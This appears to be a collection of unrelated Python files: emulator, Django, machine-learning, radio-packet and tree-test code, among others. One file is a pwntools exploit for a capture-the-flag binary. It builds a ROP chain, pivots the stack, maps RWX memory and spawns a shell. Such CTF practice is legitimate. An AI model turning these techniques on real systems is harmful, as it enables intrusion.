# should only be two imports - one for cuckoo and one for pe
assert full_text.count("import ") == 0
| 7,889 | 2,478 |
import warnings
import socket
class FCEUXServer:
'''
Server class for making NES bots. Uses FCEUX emulator.
Visit https://www.fceux.com for info. You will also need to
load client lua script in the emulator.
'''
def __init__(self, frame_func, quit_func=None, ip='localhost', port=1234):
'''
Parameters
----------
frame_func : function
This function will be called every frame. The function should
accept two argument, :code:`server` (reference to this class)
and :code:`frame` (number of frames executed).
quit_func : function
This function will be executed when the server disconnects from
the emulator
ip : str
IP address of the computer.
port : int
Port to listen to.
'''
# Eshtablish connection with client
self._serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._serversocket.bind((ip, port))
self._serversocket.listen(5)
self._clientsocket, self._address = self._serversocket.accept()
# This function will be called every frame
self._on_frame_func = frame_func
self._on_quit_func = quit_func
self._server_info = self.recv() + ' ' + str(self._address)
self.send('ACK')
@property
def info(self):
'''
Emulator info and lua version.
'''
return self._server_info
def send(self, msg):
'''
Send message to lua code running on the emulator.
Parameters
----------
msg : str
'''
if(not type(msg) is str):
self.quit()
raise TypeError('Arguments have to be string')
self._clientsocket.send(bytes(msg+'\n', 'utf-8'))
def recv(self):
'''
Receive message from lua code running on emulator.
Returns
-------
str
Received message from emulator.
'''
return self._clientsocket.recv(4096).decode('utf-8')
def init_frame(self):
'''
Signal server to prep for next frame and returns
frame count
Returns
-------
int
Frame count
'''
# Receive message from client
frame_str = self.recv()
if(len(frame_str) == 0):
self.quit('Client had quit')
frame = int(frame_str)
return frame
def start(self):
'''
Starts the server, waits for emulator to connect.
Calls :code:`frame_func` every frame after connection
has been established.
'''
try:
# Keep receiving messaged from FCEUX and acknowledge
while True:
frame = self.init_frame()
self._on_frame_func(self, frame)
except BrokenPipeError:
self.quit('Client has quit.')
except KeyboardInterrupt:
self.quit()
def frame_advance(self):
'''
Move to next frame, should be called at the end of
:code:`frame_func`.
'''
# Send back continue message
self.send('CONT')
def get_joypad(self):
'''
Returns
-------
str
Joypad button states.
'''
self.send('JOYPAD')
return self.recv()
def set_joypad(self, up=False, down=False, left=False,
right=False, A=False, B=False, start=False, select=False):
'''
Set joypad button states.
'''
self.send('SETJOYPAD')
joypad = str(up)+' '+str(down)+' '+str(left)+' '+str(right)\
+' '+str(A)+' '+str(B)+' '+str(start)+' '+str(select)
self.send(joypad)
def read_mem(self, addr, signed=False):
'''
Read memory address.
Parameters
----------
addr : int
The memory address to read
signed : bool
If :code:`True`, returns signed integer
Returns
-------
int
The byte at the address.
'''
self.send('MEM')
self.send(str(addr))
unsigned = int(self.recv())
if(signed):
return unsigned-256 if unsigned>127 else unsigned
else:
return unsigned
def reset(self):
'''
Resets the emulator, executes a power cycle.
'''
self.send('RES')
def quit(self, reason=''):
'''
Disconnect from emulator.
Parameters
----------
reason : str
Reason for quitting.
'''
if(self._on_quit_func is not None):
self._on_quit_func()
self._serversocket.close()
self._clientsocket.close()
print(reason)
print('Server has quit.')
exit()
if(__name__ == '__main__'):
def on_frame(server, frame):
print(frame)
print(server.get_joypad())
server.frame_advance()
server = FCEUXServer(on_frame)
print(server.info)
server.start()
| 5,109 | 1,439 |
from django import forms
from .widgets import SpanWidget
class MultiSelectFormField(forms.MultipleChoiceField):
""" http://djangosnippets.org/snippets/1200/ """
widget = forms.CheckboxSelectMultiple
def __init__(self, *args, **kwargs):
self.max_choices = kwargs.pop('max_choices', 0)
super(MultiSelectFormField, self).__init__(*args, **kwargs)
def clean(self, value):
if not value and self.required:
raise forms.ValidationError(self.error_messages['required'])
return value
class SpanField(forms.Field):
"""
A field which renders a value wrapped in a <span> tag.
Requires use of specific form support. (see ReadonlyForm or ReadonlyModelForm)
"""
def __init__(self, *args, **kwargs):
kwargs['widget'] = kwargs.get('widget', SpanWidget)
super(SpanField, self).__init__(*args, **kwargs)
| 905 | 274 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
author: Ewen Wang
email: wolfgangwong2012@gmail.com
license: Apache License 2.0
"""
import warnings
warnings.filterwarnings('ignore')
import random
random.seed(0)
import time
import json
import pandas as pd
import matplotlib.pyplot as plt
import catboost as cb
class CAT(object):
"""docstring for CAT"""
def __init__(self, data, indcol, target, features, features_cat, predicting=False, multi=0, balanced=0, gpu=0, seed=0):
super(CAT, self).__init__()
self.data = data
self.indcol = indcol
self.features = features
self.features_cat = features_cat
self.predicting = predicting
self.data[self.features_cat] = self.data[self.features_cat].fillna('NaN')
if self.predicting:
self.target = None
self.dtest = cb.Pool(data=self.data[self.features],
cat_features=self.features_cat)
else:
self.target = target
self.dtrain = cb.Pool(data=self.data[self.features],
label=self.data[self.target],
cat_features=self.features_cat)
self.multi = multi
self.balanced = balanced
self.gpu = gpu
self.seed = seed
self.params = {}
self.cvr = pd.DataFrame()
self.prediction = pd.DataFrame()
def algorithm(self, iterations=100, early_stopping_rounds=20, nfold=10, type='Classical', loss_function='Logloss', verbose=100, plot=False):
self.params['iterations'] = iterations
self.params['early_stopping_rounds'] = early_stopping_rounds
self.params['loss_function'] = loss_function
self.params['verbose'] = verbose
message = 'cross validation started and will stop if performace did not improve in {} rounds.'.format(early_stopping_rounds)
print(message)
self.cvr = cb.cv(dtrain=self.dtrain,
params=self.params,
nfold=nfold,
seed=self.seed,
type=type,
plot=plot)
self.n_rounds = self.cvr.shape[0]
message = 'cross validation done with number of rounds: {}.'.format(self.n_rounds)
print(message)
message = 'test {}: {:.3f}'.format(self.params['loss_function'], self.cvr.iloc[-1, 1])
print(message)
return self.n_rounds
def train(self, path_model=None):
try:
message = 'number of training rounds: %d.' % self.n_rounds
print(message)
except Exception as e:
message = 'no hpyter parameters assigned and default assigned.'
print(message)
self.algorithm()
print(json.dumps(self.params, indent=4))
self.bst = cb.CatBoostClassifier(iterations=self.n_rounds)
self.bst.fit(self.dtrain)
if path_model == None:
pass
else:
self.bst.save_model(path_model)
print('model saved in path: %s' % path_model)
self.prediction[self.indcol] = self.data[self.indcol]
self.prediction['prob'] = self.bst.predict_proba(self.dtrain)[:,1]
self.prediction['pred'] = self.bst.predict(self.dtrain)
message = 'prediction done.'
print(message)
return None
def predict(self, path_model, path_result=None):
self.bst = cb.CatBoostClassifier()
self.bst.load_model(path_model)
message = 'model loaded from path: {}'.format(path_model)
print(message)
self.prediction[self.indcol] = self.data[self.indcol]
self.prediction['prob'] = self.bst.predict_proba(self.dtest)[:,1]
self.prediction['pred'] = self.bst.predict(self.dtest)
message = 'prediction done.'
print(message)
if path_result == None:
pass
else:
self.prediction.to_csv(path_result, index=False)
message = 'results saved in path: %s' % path_result
print(message)
return None
def learning_curve(self, figsize=(10, 5)):
if len(self.cvr) == 0:
return 'no models trained, no learning curves.'
plt.figure(figsize=figsize)
plt.plot(self.cvr[self.cvr.columns[1]], label='test')
plt.plot(self.cvr[self.cvr.columns[3]], label='train')
plt.title('learning curve')
plt.xlabel('number of rounds')
plt.ylabel(self.params['loss_function'])
plt.legend(loc='lower right', title='dataset')
plt.grid()
plt.show()
return None
def report(self):
try:
from gossipcat.Report import Visual
except Exception as e:
print('[WARNING] Package GossipCat not installed.')
try:
from Report import Visual
except Exception as e:
return '[ERROR] Package Report not installed.'
test_target = self.data[self.target]
prob = self.prediction['prob']
plt.figure(figsize=(6, 5.5))
self.prediction['prob'].hist(bins=100)
plt.title('distribution of predictions')
vis = Visual(test_target=test_target, test_predprob=prob)
vis.combo()
self.df_cap = vis.df_cap
return None | 5,480 | 1,637 |
#!/usr/bin/python
import sys
import socket
import asyncio
import select
from hexdump import hexdump
KISS_FEND = 0xC0 # Frame start/end marker
KISS_FESC = 0xDB # Escape character
KISS_TFEND = 0xDC # If after an escape, means there was an 0xC0 in the source message
KISS_TFESC = 0xDD # If after an escape, means there was an 0xDB in the source message
class kiss_ax25:
def __init__(self, callsign, kiss_tcp_addr="127.0.0.1", kiss_tcp_port=8001):
self.callsign = callsign
self.kiss_addr = kiss_tcp_addr
self.kiss_port = kiss_tcp_port
self.src_addr = encode_address(callsign.upper(), True)
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((self.kiss_addr, self.kiss_port))
self.poller = select.poll()
self.poller.register(self.s, select.POLLIN)
def send(self, dest_call, message):
dest_addr = encode_address(dest_call.upper(), False)
c_byte = [0x03] # This is a UI frame
pid = [0xF0] # No protocol
msg = [ord(c) for c in message]
packet = dest_addr + self.src_addr + c_byte + pid + msg
# Escape the packet in case either KISS_FEND or KISS_FESC ended up in our stream
packet_escaped = []
for x in packet:
if x == KISS_FEND:
packet_escaped += [KISS_FESC, KISS_TFEND]
elif x == KISS_FESC:
packet_escaped += [KISS_FESC, KISS_TFESC]
else:
packet_escaped += [x]
# Build the frame that we will send to Dire Wolf and turn it into a string
kiss_cmd = 0x00 # Two nybbles combined - TNC 0, command 0 (send data)
kiss_frame = [KISS_FEND, kiss_cmd] + packet_escaped + [KISS_FEND]
output = bytearray(kiss_frame)
self.s.send(output)
def recv(self):
recv_data = []
message=''
msg_bit = False
fdVsEvent = self.poller.poll(500)
if fdVsEvent == []:
return "None", "None"
for descriptor, Event in fdVsEvent:
recv_byte = self.s.recv(1)
recv_byte = b'\x00'
while recv_byte != KISS_FEND:
recv_byte = ord(self.s.recv(1))
if recv_byte == 0xF0:
msg_bit = True
if msg_bit:
message+=chr(recv_byte)
recv_data.append(recv_byte)
source = decode_address(recv_data[1+7:8+7])
hexdump(''.join(message))
return source, ''.join(message)
def kill(self):
self.s.shutdown(socket.SHUT_RD)
#self.s.close()
def recv_kiss():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8001))
print("Recieving")
recv_data = []
recv_byte = s.recv(1)
while True:
recv_byte = s.recv(1)
print(recv_byte)
if recv_byte == b'\xc0':
#print("End of Transmission")
break
recv_data += recv_byte
s.close()
return recv_data
#Code below here slightly modified from https://thomask.sdf.org/blog/2018/12/15/sending-raw-ax25-python.html
def send_kiss(source_call, dest_call, message):
# Make a UI frame by concatenating the parts together
# This is just an array of ints representing bytes at this point
dest_addr = encode_address(dest_call.upper(), False)
src_addr = encode_address(source_call.upper(), True)
c_byte = [0x03] # This is a UI frame
pid = [0xF0] # No protocol
msg = [ord(c) for c in message]
packet = dest_addr + src_addr + c_byte + pid + msg
# Escape the packet in case either KISS_FEND or KISS_FESC ended up in our stream
packet_escaped = []
for x in packet:
if x == KISS_FEND:
packet_escaped += [KISS_FESC, KISS_TFEND]
elif x == KISS_FESC:
packet_escaped += [KISS_FESC, KISS_TFESC]
else:
packet_escaped += [x]
# Build the frame that we will send to Dire Wolf and turn it into a string
kiss_cmd = 0x00 # Two nybbles combined - TNC 0, command 0 (send data)
kiss_frame = [KISS_FEND, kiss_cmd] + packet_escaped + [KISS_FEND]
output = str(bytearray(kiss_frame))
#hexdump(bytearray(kiss_frame))
# Connect to Dire Wolf listening on port 8001 on this machine and send the frame
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8001))
s.send(output)
s.close()
# Addresses must be 6 bytes plus the SSID byte, each character shifted left by 1
# If it's the final address in the header, set the low bit to 1
# Ignoring command/response for simple example
def encode_address(s, final):
if "-" not in s:
s = s + "-0" # default to SSID 0
call, ssid = s.split('-')
if len(call) < 6:
call = call + " "*(6 - len(call)) # pad with spaces
encoded_call = [ord(x) << 1 for x in call[0:6]]
encoded_ssid = (int(ssid) << 1) | 0b01100000 | (0b00000001 if final else 0)
return encoded_call + [encoded_ssid]
def decode_address(s):
call = [chr(x>>1) for x in s[0:6]]
ssid = str( (s[6] >> 1) & 0b11001110)
#print(str(call)+":"+ssid)
return ''.join(call)+'-'+ssid
#send_kiss("kn4vhm","km4yhi","hi") | 4,698 | 2,044 |
from django.db import models
from users.models import User, BaseModel
class CommonModel(models.Model):
"""This is common model which we are using for common attributes not
included in Database as a table
:param models.Model: Class to create a new instance of a model,
instantiate it like any other Python class
"""
created_by = models.ForeignKey(User, null=True, related_name='%(class)s_requests_created',
on_delete=models.CASCADE)
modified_by = models.ForeignKey(User, null=True, related_name='%(class)s_requests_modified',
on_delete=models.CASCADE)
class Meta:
abstract = True
# Create your models here.
class Wall(BaseModel, CommonModel):
"""
Wall class is define for the keep the Wall details and other information.
:param CommonModel:CommonModel which has common attribute for the
application.
:param BaseModel: Base class which has common attribute for the
application.
"""
title = models.CharField(max_length=50, unique=True)
content = models.TextField()
@property
def get_total_likes(self):
return self.likes.users.count()
@property
def get_total_dis_likes(self):
return self.dis_likes.users.count()
def __str__(self):
return self.title
class Meta:
ordering = ['-created_on']
class Comment(BaseModel, CommonModel):
"""
Comment class is define for the keep the Comment details and other information.
:param CommonModel:CommonModel which has common attribute for the
application.
:param BaseModel: Base class which has common attribute for the
application.
"""
wall = models.ForeignKey(Wall, on_delete=models.CASCADE, blank=True, null=True, related_name="comments")
comment_content = models.CharField(max_length=200)
def __str__(self):
return self.comment_content
class Meta:
ordering = ['-created_on']
class Like(BaseModel):
"""
Like class is define for the keep the Like details and other information.
:param BaseModel: Base class which has common attribute for the
application.
"""
wall = models.OneToOneField(Wall, related_name="likes", on_delete=models.CASCADE)
users = models.ManyToManyField(User, related_name='requirement_wall_likes', blank=True)
def __str__(self):
return str(self.comment.comment)[:30]
class DisLike(BaseModel):
"""
DisLike class is define for the keep the DisLike details and other information.
:param BaseModel: Base class which has common attribute for the
application.
"""
wall = models.OneToOneField(Wall, related_name="dis_likes", on_delete=models.CASCADE)
users = models.ManyToManyField(User, related_name='requirement_wall_dis_likes', blank=True)
def __str__(self):
return str(self.wall.title)[:30]
| 2,903 | 823 |
#!/usr/bin/python
import os
import re
import jinja2
def generate_metadata(name, additional_dict=None):
result = {
'package': 'it.unimi.dsi.fastutil.%ss' % name.lower(),
'primitive': name.lower(),
'boxed_class': name
}
result.update(additional_dict or {})
return name, result
kind_metadata = {
k: v for (k, v) in [
generate_metadata('Byte'),
generate_metadata('Char', {'boxed_class': 'Character'}),
generate_metadata('Double'),
generate_metadata('Float'),
generate_metadata('Int', {'boxed_class': 'Integer'}),
generate_metadata('Long'),
generate_metadata('Short'),
generate_metadata('Object', {'primitive': None, 'boxed_class': 'String'}),
# This is mostly the same as Object with the difference that equality is checked
# using "==" instead of equals
generate_metadata('Reference', {
'package': 'it.unimi.dsi.fastutil.objects',
'primitive': None,
'boxed_class': 'String',
}),
]
}
def is_ref(kind):
return kind == 'Object' or kind == 'Reference'
def map_cast(kind, target_kind, suffix):
result = '%s2%s%s' % (kind, target_kind, suffix)
boxed_class = kind_metadata['Object']['boxed_class']
if is_ref(kind) and is_ref(target_kind):
result += '<%s, %s>' % (boxed_class, boxed_class)
elif is_ref(target_kind):
result += '<%s>' % boxed_class
return result
script_dir = os.path.dirname(os.path.realpath(__file__))
env = jinja2.Environment(loader=jinja2.FileSystemLoader(script_dir), autoescape=False, trim_blocks=True)
env.globals['map_cast'] = map_cast
test_template = env.get_template('collection_tests.j')
for kind in kind_metadata.keys():
output = test_template.render(
kinds=kind_metadata.keys(),
kind=kind, metadata=kind_metadata[kind], metadatas=kind_metadata)
output = re.sub(r'(new (?:Object|Reference)\w+?(?:Set|List))(?=\()', r'\1<String>', output)
output = re.sub(r'\(((?:Object|Reference)2\w+Map)\) ', r'(\1<String>) ', output)
with open('%sCollectionsTest.java' % kind, 'w') as f:
f.write(output)
| 2,171 | 701 |
from tests import test_article
from tests import test_source | 60 | 14 |
from random import randint
from BST_version_3 import BinaryTreeNode, BinaryTree
# I have to keep the build of lists under 3,000 total
# my computer starts to freak out about memory at 10,000
# it slows at 3000.
# recursion depth happens on count at 2000 items
def test_set():
oaktree = BinaryTree(50.5)
for i in range(0, 50):
oaktree.set(i, 'crunchy leaves')
assert oaktree._size == 50
for i in range(50, 100):
oaktree.set(i, 'acorns')
assert oaktree._size == 100
for i in range(0, 50):
oaktree.set(i, 'gypsy moths')
assert oaktree._size == 100
def test_count():
mapletree = BinaryTree(75.5)
for i in range(0, 100):
x = randint(1, 100)
mapletree.set(x, 'climbable')
assert mapletree._size == mapletree.count()
for i in range(0, 50):
x = randint(100, 150)
mapletree.set(x, 'shade')
assert mapletree._size == mapletree.count()
pinetree = BinaryTree(80.5)
for i in range(0, 160):
pinetree.set(i, 'christmas')
assert pinetree.count() == 160
pinetree.set(161, 'needles')
assert pinetree.count() == 161
def test_delete():
oaktree = BinaryTree(50.5)
for i in range(0, 50):
oaktree.set(i, 'crunchy leaves')
pinetree = BinaryTree(80.5)
for i in range(0, 160):
pinetree.set(i, 'christmas')
oaktree.delete(1)
assert oaktree.count() == 49
assert oaktree._size == 49
oaktree.delete(25)
assert oaktree.count() == 48
assert oaktree._size == 48
for i in range(0, 160):
pinetree.delete(i)
assert pinetree.count() == 0
assert pinetree._size == 0
for i in range(2, 25):
oaktree.delete(i)
assert oaktree.count() == 25
assert oaktree._size == 25
redwood = BinaryTree(11.5)
redlist = []
for i in range(0, 40):
x = randint(0, 40)
if x not in redlist:
redlist.append(x)
redwood.set(x, 'not 40')
assert redwood.count != 40
length_redlist = len(redlist)
assert redwood._size == length_redlist
for i in range(0, length_redlist):
redwood.delete(redlist[i])
assert redwood._size == 0
## was a FAIL...
## fixed. was removing the temp.left and temp.right
## only should remove the temp link that matched the (akey)
## that we want to delete.
assert redwood.count() == redwood._size
rightsided = BinaryTree(5.5)
righty = []
for i in range(0, 50):
rightsided.set(i, "slide to the right.")
righty.append(i)
assert len(righty) == rightsided._size
for i in range(0, 50):
rightsided.delete(i)
assert rightsided._size == 0
leftsided = BinaryTree(100.5)
lefty = []
for i in range(0, 50):
leftsided.set(i, "slide to the left")
lefty.append(i)
assert len(lefty) == leftsided._size
#### random leftsided rightsided
for i in range(0, 50):
x = randint(6, 50)
rightsided.set(x, "one hop this time")
righty2 = rightsided.make_key_list()
assert len(righty2) == rightsided._size
jump_jump = rightsided._size
for i in range(0, jump_jump):
x = righty2[i]
rightsided.delete(x)
assert rightsided._size == rightsided.count() == 0
for i in range(0, 50):
x = randint(0, 90)
leftsided.set(x, "cha-cha now ya'all.")
lefty2 = leftsided.make_key_list()
assert len(lefty2) == leftsided._size
cha_cha = leftsided._size
for i in range(0, cha_cha):
x = lefty2[i]
leftsided.delete(x)
assert leftsided._size == leftsided.count() == 0
### TEST A LARGE TREE ###
rainforest = BinaryTree(500.5)
for i in range(0, 1000):
x = randint(0, 1000)
rainforest.set(x, "oxygen")
rainy = rainforest.make_key_list()
assert len(rainy) == rainforest._size
cha_cha = rainforest._size
for i in range(0, cha_cha):
x = rainy[i]
rainforest.delete(x)
assert rainforest._size == rainforest.count() == 0
def test_make_list():
willow = BinaryTree(50.5)
messy_tree = []
### willow, lopsidded
for i in range(0, 50):
willow.set(i, "weeping")
messy_tree.append(i)
will_list = willow.make_key_list()
willow_size = willow.count()
assert len(will_list) == willow_size
for i in range(0, 50):
assert will_list[i] in messy_tree
## make_list_ appends from root.left, root.right down the branches
## the lists will have a different order, root.right will be second in the
## make_list, as it will most likely not be the second appended to manual list
for i in range(0, 50):
assert messy_tree[i] in will_list
## silver_spruce more even
silver_spruce = BinaryTree(40.5)
decor = []
for i in range(0, 82):
silver_spruce.set(i, 'firewood')
decor.append(i)
pine = silver_spruce.make_key_list()
spruce_count = silver_spruce.count()
assert len(pine) == spruce_count
for i in range(0, 82):
assert decor[i] in pine
for i in range(0, 82):
assert pine[i] in decor
### random made even tree
apple = BinaryTree(30.5)
pie = []
for i in range(0, 40):
x = randint(0, 62)
apple.set(x, "buggy")
pie.append(x)
juice = apple.make_key_list()
apple_size = apple.count()
assert apple_size == len(juice)
for i in range(0, apple_size):
assert juice[i] in pie
assert pie[i] in juice
def test_get():
oaktree = BinaryTree(-511.5)
oaklist = []
oaktree.set(-211, "spam1")
oaklist.append(-211)
oaktree.set(-739, "spam2")
oaklist.append(-739)
oaktree.set(-279, "spam3")
oaklist.append(-279)
oaktree.set(-417, "spam4")
oaklist.append(-417)
oaktree.set(-419, "spam5")
oaklist.append(-419)
oaktree.set(-969, "spam6")
oaklist.append(-969)
oaktree.set(-14, "spam7")
oaklist.append(-14)
oaktree.set(-715, "spam8")
oaklist.append(-715)
oaktree.set(-351, "spam9")
oaklist.append(-351)
oaktree.set(-349, "spam10")
oaklist.append(-349)
oaktree.set(-893, "spam11")
oaklist.append(-893)
oaktree.set(-672, "spam12")
oaklist.append(-672)
oaktree.set(-455, "spam13")
oaklist.append(-455)
oaktree.set(-21, "spam14")
oaklist.append(-21)
oaktree.set(-463, "spam15")
oaklist.append(-463)
######################
oaktree.set(-321, "spam16")
oaklist.append(-321)
oaktree.set(-6, "spam17")
oaklist.append(-6)
oaktree.set(-741, "spam18")
oaklist.append(-741)
oaktree.set(-494, "spam19")
oaklist.append(-494)
oaktree.set(-595, "spam20")
oaklist.append(-595)
oaktree.set(-452, "spam21")
oaklist.append(-452)
oaktree.set(-36, "spam22")
oaklist.append(-36)
oaktree.set(-358, "spam23")
oaklist.append(-358)
oaktree.set(-796, "spam24")
oaklist.append(-796)
oaktree.set(-625, "spam25")
oaklist.append(-625)
oaktree.set(-61, "spam26")
oaklist.append(-61)
oaktree.set(-329, "spam27")
oaklist.append(-329)
############################
oaktree.set(-35, "spam28")
oaklist.append(-35)
oaktree.set(-106, "spam29")
oaklist.append(-106)
oaktree.set(-393, "spam30")
oaklist.append(-393)
oaktree.set(-57, "spam31")
oaklist.append(-57)
oaktree.set(-314, "spam32")
oaklist.append(-314)
oaktree.set(-51, "spam33")
oaklist.append(-51)
oaktree.set(-62, "spam34")
oaklist.append(-62)
oaktree.set(-689, "spam35")
oaklist.append(-689)
oaktree.set(-366, "spam36")
oaklist.append(-366)
oaktree.set(-344, "spam37")
oaklist.append(-344)
oaktree.set(-463, "spam38")
oaklist.append(-463)
oaktree.set(-663, "spam39")
oaklist.append(-663)
oaktree.set(-318, "spam40")
oaklist.append(-318)
assert oaktree.get(-318) == "spam40"
assert oaktree.get(100) == None
assert oaktree.get(-393) == "spam30"
assert oaktree.get(-969) == "spam6"
assert oaktree.get(-6) =="spam17"
assert oaktree.get(-211) == "spam1"
assert oaktree.get(-279) == "spam3"
assert oaktree.get(-969) == "spam6"
for akey in oaklist:
assert oaktree.get(akey) != None
oaktree.delete(-211)
oaktree.delete(-739)
assert oaktree.get(-211) == None
assert oaktree.get(-739) == None
| 7,451 | 3,564 |
import keras.layers as KL
class BatchNorm(KL.BatchNormalization):
"""Batch Normalization class. Subclasses the Keras BN class and
hardcodes training=False so the BN layer doesn't update
during training.
Batch normalization has a negative effect on training if batches are small
so we disable it here.
"""
def call(self, inputs, training=None):
return super(self.__class__, self).call(inputs, training=False) | 445 | 125 |
import pytest
from utils import make_hash_sha256
# test_utils.py
def test_make_hash_sha256():
w = {'a': ['b', None, dict(c=dict(), d=(1, 2))], (3, 4): 'e'}
x = {'a': ['b', None, dict(c=dict(), d=(1, 2))], (3, 4): 'e'}
y = {'b': ['b', None, dict(c=dict(), d=(1, 2))], (3, 4): 'e'}
z = {(3, 4): 'e', 'b': ['b', None, dict(c=dict(), d=(1, 2))]}
assert make_hash_sha256(w) == make_hash_sha256(x)
assert make_hash_sha256(x) != make_hash_sha256(y)
assert make_hash_sha256(y) != make_hash_sha256(z)
| 523 | 260 |
TOKEN = ""
GUILD = ""
# crypto bot
API_KEY_COINMARKETCAP = "" | 62 | 32 |
# Generated by Django 3.1.4 on 2022-02-25 05:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('organizations', '0002_organizationcustomer'),
('loans', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='product',
name='organization',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='organizations.organization'),
),
]
| 543 | 179 |
#!/usr/bin/env python2
"""
Run exploit locally with:
./solve.py
./solve.py REMOTE HOST=challenge.acictf.com PORT=45110
"""
import ast
import struct
import subprocess
from pwn import *
PROG_PATH = './challenge'
PROT_RWX = constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC
EGG_SIZE = 0x1000
def init_pwntools_context():
context.binary = PROG_PATH
context.terminal = ['tmux', 'vsplit', '-h']
context.log_level = 'debug'
def init_io():
if args['REMOTE']:
return remote(args['HOST'], int(args['PORT']))
else:
pty = process.PTY
return process(PROG_PATH, stdin=pty, stdout=pty, stderr=pty)
def check_out(io, shelf_idx, backpack_idx):
io.sendlineafter('\n\n', '2')
io.sendlineafter('book in?\n', str(shelf_idx))
io.sendlineafter('put the book?\n', str(backpack_idx))
def leave(io):
io.sendlineafter('\n\n', '9')
def fill_choice_buffer(io, data):
assert '\n' not in data
io.sendlineafter('\n\n', '1')
io.sendlineafter('\n\n', '0')
io.sendlineafter('Title?\n', data)
class Addrs:
CHOICE_BUF = 0x603100
MMAP = 0x4008e0
READ = 0x400930
def write_binary(io):
size = io.recvn(4)
size = struct.unpack('>I', size)[0]
log.info('Receiving ELF of size ' + str(size))
elf = io.recvn(size)
with open('challenge', 'w') as f:
f.write(elf)
def get_gadget(ropper_out, target, bad_str='0a'):
for line in ropper_out.splitlines():
line = line.strip()
if not line or not line.startswith('0x'):
continue
addr, instr = line.split(': ')
if bad_str in addr:
continue
if instr == target:
return ast.literal_eval(addr)
log.error('FAILED looking for: ' + target)
def get_gadgets():
raw_gadgets = subprocess.check_output('ropper --nocolor --file ./challenge', shell=True)
gadgets = {}
gadgets['POP_RDI'] = get_gadget(raw_gadgets, 'pop rdi; ret;')
gadgets['POP_RSI'] = get_gadget(raw_gadgets, 'pop rsi; ret;')
gadgets['POP_RDX'] = get_gadget(raw_gadgets, 'pop rdx; ret;')
gadgets['POP_R8_R9_RCX'] = get_gadget(raw_gadgets, 'pop r8; pop r9; pop rcx; ret;')
gadgets['POP_RAX_R9_RCX'] = get_gadget(raw_gadgets, 'pop rax; pop r9; pop rcx; ret;')
gadgets['POP_RSP'] = get_gadget(raw_gadgets, 'pop rsp; pop r13; pop r14; pop r15; ret;')
jmp_gadgets = subprocess.check_output('ropper --nocolor --file ./challenge --jmp rax', shell=True)
gadgets['JMP_RAX'] = get_gadget(jmp_gadgets, 'jmp rax;')
return gadgets
def win(io):
if args['REMOTE']:
write_binary(io)
gadgets = get_gadgets()
# Account for pop's from pivoted stack pointer.
rop = 'A' * 0x18
mmap_addr = 0x7fe7a1e8f000
# mmap
rop += p64(gadgets['POP_RDI'])
rop += p64(mmap_addr)
rop += p64(gadgets['POP_RSI'])
rop += p64(EGG_SIZE)
rop += p64(gadgets['POP_RDX'])
rop += p64(PROT_RWX)
rop += p64(gadgets['POP_R8_R9_RCX'])
rop += p64(0xffffffffffffffff) # 5th arg
rop += p64(0) # 6th arg
rop += p64(constants.MAP_PRIVATE | constants.MAP_FIXED | constants.MAP_ANON) # 4th arg
rop += p64(Addrs.MMAP)
# read
rop += p64(gadgets['POP_RDI'])
rop += p64(0)
rop += p64(gadgets['POP_RSI'])
rop += p64(mmap_addr)
rop += p64(gadgets['POP_RDX'])
rop += p64(EGG_SIZE)
rop += p64(Addrs.READ)
# redirect execution
rop += p64(gadgets['POP_RAX_R9_RCX'])
rop += p64(mmap_addr)
rop += p64(0)
rop += p64(0)
rop += p64(gadgets['JMP_RAX'])
fill_choice_buffer(io, rop)
# stack pivot
check_out(io, Addrs.CHOICE_BUF, -8)
check_out(io, 0, -7)
check_out(io, gadgets['POP_RSP'], -10)
# final payload
sc = asm(shellcraft.sh())
assert len(sc) <= EGG_SIZE
sc = sc + 'A' * (EGG_SIZE - len(sc))
io.send(sc)
io.interactive()
if __name__ == '__main__':
init_pwntools_context()
io = init_io()
if args['PAUSE']:
raw_input('PAUSED...')
win(io)
| 4,026 | 1,787 |
#!/usr/bin/env python
import os
import sys
import time
import django
sys.path.insert(0, './tests')
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')
if __name__ == '__main__':
from django.core.management import execute_from_command_line
args = sys.argv
args.insert(1, 'test')
if len(args) == 2:
args.insert(2, 'djsonb_fields')
execute_from_command_line(args)
| 403 | 147 |
from os import path
import csv
import json
import random
# Our dataset was created from http://www2.informatik.uni-freiburg.de/~cziegler/BX/ and reduced down to 1,000 records
# The CSV file has semicolon delimiters due to book titles containing commas
SCRIPT_DIR = path.dirname(path.realpath(__file__)) + '/'
DB_FILE = SCRIPT_DIR + 'cscl_db.csv'
OUTPUT_FILE = SCRIPT_DIR + 'cscl_db.json'
# Original headers: "ISBN";"Book-Title";"Book-Author";"Year-Of-Publication";"Publisher";"Image-URL-S";"Image-URL-M";"Image-URL-L"
with open(DB_FILE, 'r') as file:
reader = csv.DictReader(file,
delimiter=';',
fieldnames=[
'isbn', 'title', 'author', 'publication_year',
'publisher', 'image_url_s', 'image_url_m',
'image_url_l'
])
with open(OUTPUT_FILE, 'w') as o_file:
for line in reader:
copies = random.randrange(1,10)
available = random.randrange(0,copies)
line['copies'] = copies
line['available'] = available
# Convert publication_year from string to int
line['publication_year'] = int(line['publication_year'])
json.dump(line, o_file)
o_file.write('\n')
print(
'\n----------\nFinished converting {} from CSV to JSON.\nFile can be found at {}'
.format(DB_FILE, OUTPUT_FILE))
| 1,485 | 449 |
from channels import route
from .features import consumers
path = r'^/api/projects/(?P<id>[0-9a-f-]+)/stream/$'
channel_routing = [
route("websocket.connect", consumers.connect_to_project, path=path),
route("websocket.receive", consumers.disconnect_from_project, path=path)
]
| 286 | 98 |
#!/usr/bin/env python
# https://github.com/studioimaginaire/phue
import rospy
from geometry_msgs.msg import PoseStamped, Pose, Pose2D
from std_msgs.msg import String
import json
import io
import os
# pose = Pose value
# location = string value
class Location():
def __init__(self):
self.PATH = rospy.get_param('locations_json')
# Load the location data
self.jsonCheck()
self.load_dict()
#self.write_dict()
# Set up publishers
